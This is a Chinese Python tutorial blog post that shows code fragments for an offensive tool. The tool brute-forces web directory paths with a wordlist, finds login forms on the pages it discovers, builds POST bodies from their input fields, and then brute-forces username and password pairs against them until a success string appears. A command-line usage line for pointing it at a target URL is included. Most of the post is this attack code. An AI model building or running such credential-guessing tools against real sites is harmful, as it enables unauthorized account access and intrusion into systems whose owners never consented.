首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

python遍历路径破解表单的示例

Posted in Python onNovember 21, 2020

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注三水点靠木其它相关文章!

python遍历路径破解表单的示例

- Author -

Misaki''s

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
让Python代码更快运行的5种方法
Jun 21 Python
Python的socket模块源码中的一些实现要点分析
Jun 06 Python
使用Python进行AES加密和解密的示例代码
Feb 02 Python
python实现媒体播放器功能
Feb 11 Python
python安装教程
Feb 28 Python
python reverse反转部分数组的实例
Dec 13 Python
Python构建图像分类识别器的方法
Jan 12 Python
Python3 log10()函数简单用法
Feb 19 Python
利用Python半自动化生成Nessus报告的方法
Mar 19 Python
Python操作Excel工作簿的示例代码(\*.xlsx)
Mar 23 Python
python实现学生管理系统开发
Jul 24 Python
Python自动化工具之实现Excel转Markdown表格
Apr 08 Python
Python如何批量生成和调用变量
Nov 21 #Python
在终端启动Python时报错的解决方案
Nov 20 #Python
python 批量下载bilibili视频的gui程序
Nov 20 #Python
Python ellipsis 的用法详解
Nov 20 #Python
python 动态渲染 mysql 配置文件的示例
Nov 20 #Python
Python paramiko使用方法代码汇总
Nov 20 #Python
分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功
Nov 20 #Python
磁盘管理(1) 二维码(2) Get(1) Post(1) 条码(1) plus.io(1) html5+(1) Word(2) 目录管理(1) 日志(1)
You might like
php下获取客户端ip地址的函数
2010/03/15 PHP
从零开始学YII2框架(六)高级应用程序模板
2014/08/20 PHP
Yii2.0使用阿里云OSS的SDK上传图片、下载、删除图片示例
2017/09/20 PHP
php 字符串中是否包含指定字符串的多种方法
2018/04/12 PHP
Laravel5.5 视图 - 创建视图和数据传递示例
2019/10/21 PHP
PHP使用PDO实现mysql防注入功能详解
2019/12/20 PHP
PHP的重载使用魔术方法代码实例详解
2021/02/26 PHP
ExtJs Excel导出并下载IIS服务器端遇到的问题
2011/09/16 Javascript
JQuery操作元素的css样式
2015/03/09 Javascript
jQuery仿淘宝网产品品牌隐藏与显示效果
2015/09/01 Javascript
JavaScript学习小结(一)——JavaScript入门基础
2015/09/02 Javascript
jQuery实现MSN中文网滑动Tab菜单效果代码
2015/09/09 Javascript
微信小程序开发之录音机 音频播放 动画实例 (真机可用)
2016/12/08 Javascript
js实现漫天星星效果
2017/01/19 Javascript
vue+axios 前端实现的常用拦截的代码示例
2018/08/23 Javascript
vue 源码解析之虚拟Dom-render
2019/08/26 Javascript
vue中使用element组件时事件想要传递其他参数的问题
2019/09/18 Javascript
微信小程序实现吸顶效果
2020/01/08 Javascript
Python3实现连接SQLite数据库的方法
2014/08/23 Python
python中zip和unzip数据的方法
2015/05/27 Python
python实现多线程的方式及多条命令并发执行
2016/06/07 Python
Django中的ajax请求
2018/10/19 Python
详解Python的循环结构知识点
2019/05/20 Python
python多线程http压力测试脚本
2019/06/25 Python
Python语言异常处理测试过程解析
2020/01/08 Python
HTML5 textarea高度自适应的两种方案
2020/04/08 HTML / CSS
马来西亚户外装备商店:PTT Outdoor
2019/07/13 全球购物
《生命 生命》教学反思
2014/04/19 职场文书
大学生活动总结怎么写
2014/04/29 职场文书
优秀安全员事迹材料
2014/05/11 职场文书
扬尘污染防治方案
2014/06/15 职场文书
社团活动总结书
2014/06/27 职场文书
2014乡镇干部纪律作风整顿思想汇报
2014/09/13 职场文书
2015教师个人工作总结范文
2015/03/31 职场文书
MySQL infobright的安装步骤
2021/04/07 MySQL
详解Go语言运用广度优先搜索走迷宫
2021/06/23 Python